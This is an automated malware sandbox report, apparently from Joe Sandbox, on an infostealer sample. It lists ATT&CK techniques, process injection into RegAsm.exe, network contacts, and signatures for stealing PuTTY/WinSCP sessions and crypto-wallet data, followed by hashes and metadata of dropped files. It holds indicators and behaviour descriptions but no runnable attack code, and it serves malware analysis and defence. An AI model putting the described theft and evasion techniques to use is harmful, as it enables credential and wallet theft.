                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Virtualization/Sandbox Evasion | LSA Secrets | 1 Network Share Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 511 Process Injection | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                  Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                  Behavior Graph (figure): ID: 1443407, Sample: file.exe, Startdate: 17/05/2024, Architecture: WINDOWS, Score: 100
                  Top level: contacted steamcommunity.com; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures
                  Processes: file.exe started RegAsm.exe and conhost.exe; RegAsm.exe started cmd.exe; cmd.exe started conhost.exe and timeout.exe
                  file.exe signatures: Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                  RegAsm.exe DNS/IP: steamcommunity.com 104.102.42.29, 443, 49704 AKAMAI-AS US United States; 95.217.240.101, 443, 49705, 49706 HETZNER-AS DE Germany
                  RegAsm.exe dropped: C:\Users\user\AppData\...\vcruntime140[1].dll, PE32; C:\Users\user\AppData\...\softokn3[1].dll, PE32; C:\Users\user\AppData\Local\...\nss3[1].dll, PE32; 10 other files (none is malicious)
                  RegAsm.exe signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); 6 other signatures

                  Source | Detection | Scanner | Label | Link
                  file.exe | 100% | Avira | HEUR/AGEN.1352999
                  file.exe | 100% | Joe Sandbox ML
                  Source | Detection | Scanner | Label | Link
                  C:\ProgramData\FCGCGDHJEGHJ\freebl3.dll | 0% | ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\mozglue.dll | 0% | ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\msvcp140.dll | 0% | ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\nss3.dll | 0% | ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\softokn3.dll | 0% | ReversingLabs
                  C:\ProgramData\FCGCGDHJEGHJ\vcruntime140.dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqlx[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll | 0% | ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll | 0% | ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 104.102.42.29 | true | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.102.42.29 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
95.217.240.101 | unknown | Germany | 24940 | HETZNER-ASDE | false
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1443407
                    Start date and time:2024-05-17 18:05:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 1s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:file.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@9/27@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 103
                    • Number of non-executed functions: 225
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: file.exe
                    Time | Type | Description
                    12:06:06 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):159744
                                                                              Entropy (8bit):0.5394293526345721
                                                                              Encrypted:false
                                                                              SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                              MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                              SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                              SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                              SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):0.8439810553697228
                                                                              Encrypted:false
                                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                              Category:dropped
                                                                              Size (bytes):20480
                                                                              Entropy (8bit):0.6732424250451717
                                                                              Encrypted:false
                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                              Malicious:false
                                                                              Reputation:high, very likely benign file
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):155648
                                                                              Entropy (8bit):0.5407252242845243
                                                                              Encrypted:false
                                                                              SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                              MD5:7B955D976803304F2C0505431A0CF1CF
                                                                              SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                              SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                              SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):51200
                                                                              Entropy (8bit):0.8746135976761988
                                                                              Encrypted:false
                                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):9504
                                                                              Entropy (8bit):5.512408163813622
                                                                              Encrypted:false
                                                                              SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                              MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                              SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                              SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                              SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                              Malicious:false
                                                                              Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.136413900497188
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                              Category:dropped
                                                                              Size (bytes):196608
                                                                              Entropy (8bit):1.121297215059106
                                                                              Encrypted:false
                                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):5242880
                                                                              Entropy (8bit):0.03859996294213402
                                                                              Encrypted:false
                                                                              SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                              MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                              SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                              SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                              SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):32768
                                                                              Entropy (8bit):0.017262956703125623
                                                                              Encrypted:false
                                                                              SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                              MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                              SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                              SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                              SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                              Malicious:false
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: tTcrJ0HtoJ.exe, Detection: malicious
                                                                              • Filename: l2XteV3M4u.exe, Detection: malicious
                                                                              • Filename: 7067B48pY6.exe, Detection: malicious
                                                                              • Filename: kYgzDmA3j5.exe, Detection: malicious
                                                                              • Filename: 1TC3BiFJb3.exe, Detection: malicious
                                                                              • Filename: Obz5x6H28w.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious
                                                                              • Filename: emTKrlgehA.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: HaxexQ5EjD.exe, Detection: malicious
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Joe Sandbox View:
                                                                              • Filename: tTcrJ0HtoJ.exe, Detection: malicious
                                                                              • Filename: l2XteV3M4u.exe, Detection: malicious
                                                                              • Filename: 7067B48pY6.exe, Detection: malicious
                                                                              • Filename: kYgzDmA3j5.exe, Detection: malicious
                                                                              • Filename: 1TC3BiFJb3.exe, Detection: malicious
                                                                              • Filename: Obz5x6H28w.exe, Detection: malicious
                                                                              • Filename: SecuriteInfo.com.Trojan.Siggen28.47309.32751.2518.exe, Detection: malicious
                                                                              • Filename: emTKrlgehA.exe, Detection: malicious
                                                                              • Filename: file.exe, Detection: malicious
                                                                              • Filename: HaxexQ5EjD.exe, Detection: malicious
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2459136
                                                                              Entropy (8bit):6.052474106868353
                                                                              Encrypted:false
                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
